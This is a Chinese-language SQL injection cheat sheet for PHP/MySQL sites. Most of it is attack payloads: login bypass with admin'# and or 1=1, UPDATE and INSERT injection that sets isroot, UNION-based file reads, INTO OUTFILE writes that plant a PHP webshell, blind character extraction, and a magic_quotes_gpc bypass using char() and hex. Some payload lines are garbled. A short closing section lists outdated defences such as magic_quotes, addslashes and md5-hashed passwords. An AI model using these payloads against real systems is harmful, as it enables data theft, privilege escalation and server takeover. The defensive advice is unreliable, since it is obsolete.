1.字符串的注入
select:
正常select * from user where username='admin' and password='12$%&*'
利用#作为mysql中的注释:提交username的注入 admin'# 语句变为select * from user where username='admin'#' and password='12$%&*'
或者是admin' or 1=1 语句变为select * from user where username='admin' or 1=1 and password='12$%&*'

update:
同理把UPDATE users SET password='abc',email='’ WHERE id=1
转为UPDATE users SET password='abc',email='’,isroot=’1’ WHERE id=1

insert:
同理INSERT INTO user VALUES('$id','$login','$pass','$email',’2')
改为INSERT INTO user VALUES ('id','name','pass','’,’1’)#','2') 

注:浏览器url无法提交# 号,用%23代替

2.VERSION(),DATABASE(),USER() ,SYSTEM_USER() ,SESSION_USER()
获取版本用户名等信息查找mysql
select user(),database(),version();

3.利用union
select title from test where id=1 and 1$amp;
读文件:
select id,name from user where id=1 and 1$amp; 有可能搞到了配置信息了噢

写文件:
select name from user where id=1 and 1$amp;apos;$ from user into outfile '../a.php';
现在可以访问a.php看看吧。如果是< php system(dir); >呢


知道同一个表的id以及表名。然后猜测用户名第一位是否为a: select id from user where id=1 and ascii(mid(name,1,1))=97;
看另一个表:select id from test where id=(select 1 from user where ascii(mid(name,1,1))=97);


magic_quotes_gpc=On的情况(字段如果是字符串,那么就很难注入了,所以写成where id='$id'可以安全很多啊)
magic_quotes_gpc绕过法:
不能输入'号了,那么
'a'相当于char(39,97,39)
select 0x273B;输出 '; 这个也不错的
需要字符串的话可以用char或者16进制,这样就绕过了magic_quotes_gpc了


3.核心技术,利用php+mysql注入漏洞直接写入webshell。。
上传文件,文件内容< php system(dir); >,改文件名为jpg,然后利用上面的写文件方法了,配合magic_quotes_gpc绕过法使用


防注入:

有可能的话打开安全模式, display_errors=off, magic_quote_gpc=on
addslashes()或者mysql_real_escape_string()
程序判断:intval()的使用

字段值都用'$id'的方式来用

一个管理员:username和password用md5加密